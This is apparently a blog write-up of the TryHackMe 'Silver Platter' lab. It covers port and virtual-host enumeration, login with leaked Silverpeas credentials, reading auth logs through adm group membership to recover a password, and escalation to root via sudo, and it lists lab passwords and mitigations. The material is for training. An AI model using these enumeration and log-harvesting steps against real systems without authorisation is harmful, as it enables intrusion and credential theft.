Post

Broken Access Control – Credential Leakage to Privilege Escalation | Silver Platter

Posted Updated
Silver Platter Room
Silver Platter Room
By
1 min read
Broken Access Control – Credential Leakage to Privilege Escalation | Silver Platter

Overview

This room demonstrates how poor credential management and log exposure can lead to full system compromise. The attack path focuses on web enumeration, credential discovery, and privilege escalation via misconfigured permissions.

Objective

  • Enumerate services and web application
  • Gain initial access
  • Escalate privileges to root

Reconnaissance

Nmap Scan

1

nmap -p- -sV silver-platter.thm

Open Ports:

  • 22 → SSH (OpenSSH 8.9p1)
  • 80 → HTTP (nginx 1.18.0)
  • 8080 → HTTP Proxy / Web App

Web Enumeration

Directory Bruteforce

1

dirsearch -u http://silverplatter.thm/

Findings:

  • /assets (403)
  • /images (403)
  • /LICENSE.txt
  • /README.txt

Virtual Host Discovery

1

ffuf -u http://silverplatter.thm -H "Host: FUZZ.silverplatter.thm" -w wordlist.txt

Discovered:

  • header_popsci

Web Application

  • Identified software: Silverpeas
  • Username enumeration revealed:
1

scr1ptkiddy

Exploitation

Accessing Web Panel

1

http://silverplatter.thm:8080/silverpeas

Credentials Found

1
2

Username: tim
Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

SSH Access

1

ssh tim@silver-platter.thm

Post Exploitation

Check Sudo Privileges

1

sudo -l

1

User tim may not run sudo

User Groups

1

id

1

uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)

Key Finding: ADM Group Abuse

The adm group allows read access to system logs:

  • /var/log/auth.log
  • /var/log/syslog

Extracting Credentials from Logs

Searching logs reveals sensitive data:

1

cat /var/log/auth.log

Discovered Password:

1

_Zd_zx7N823/

Lateral Movement

Another user exists:

1

tyler:x:1000:1000:/home/tyler:/bin/bash

Switch user:

1

su tyler

Password:

1

_Zd_zx7N823/

Privilege Escalation

Check Sudo Permissions

1

sudo -l

If full privileges are available:

1

sudo su

Proof of Exploitation

1

whoami

1

root

Impact

  • Exposure of credentials in logs
  • Improper group permissions (adm)
  • Credential reuse between users
  • Full system compromise

Mitigation

  • Restrict access to log files
  • Avoid storing sensitive data in logs
  • Enforce least privilege principle
  • Use secure credential storage
  • Implement proper monitoring and auditing

Real-World Insight

This scenario reflects real-world environments where:

  • Developers log sensitive information for debugging
  • System logs become a goldmine for attackers
  • Misconfigured group permissions lead to privilege escalation

The attack required no exploit, only proper enumeration and awareness of Linux permissions.

Conclusion

This room highlights how small misconfigurations can chain together into a full compromise. The key takeaway is simple:

Always check user groups and logs. They often contain more than intended.

Penetration Testing, Linux Privilege Escalation
broken-access-control credential-leakage privilege-escalation linux silverpeas enumeration tryhackme
This post is licensed under CC BY 4.0 by the author.